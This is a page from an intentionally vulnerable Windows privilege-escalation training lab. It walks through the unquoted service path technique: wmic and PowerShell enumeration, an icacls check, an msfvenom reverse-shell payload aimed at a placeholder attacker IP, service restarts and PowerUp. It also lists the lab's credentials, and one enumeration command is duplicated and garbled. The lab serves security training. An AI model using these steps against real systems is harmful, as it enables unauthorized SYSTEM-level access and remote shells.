🪟 Windows Privilege Escalation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
Home Login Unquoted Paths AlwaysInstallElevated Weak Service Perms Token Impersonation DLL Hijacking Stored Credentials
⚠️ Pracivo Security Lab — Windows privilege escalation techniques. Start as low-privilege user, escalate to SYSTEM or Administrator.
Lab Credentials: ram / pracivo  |  alice / alice123  |  administrator / Admin@2024 (goal: escalate to this)

Unquoted Service Paths

PRIVILEGE ESCALATION 
# Windows resolves unquoted paths with spaces left-to-right
# Service path: C:\Program Files\Vulnerable App\service.exe
# Windows tries these in order:
#   C:\Program.exe                    ← tries this first!
#   C:\Program Files\Vulnerable.exe   ← then this
#   C:\Program Files\Vulnerable App\service.exe

# Step 1: Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\" | findstr /i /v wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\\Windows\\"

# Or use PowerShell:
Get-WmiObject -Class Win32_Service | Where-Object {$_.PathName -notmatch '"' -and $_.PathName -match ' '} | Select Name,PathName

# Example vulnerable output:
# VulnService  C:\Program Files\Vuln App\service.exe  Auto

# Step 2: Check write permissions on parent directories
icacls "C:\Program Files\Vuln App"
# If BUILTIN\Users has (W) or (F) — you can write there

# Step 3: Drop malicious executable at the hijack point
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f exe -o "C:\Program Files\Vuln.exe"

# Step 4: Restart service (if you have permission) or wait for reboot
sc stop VulnService
sc start VulnService
# Your payload runs as SYSTEM

# Automated check with PowerUp.ps1:
. .\PowerUp.ps1
Invoke-AllChecks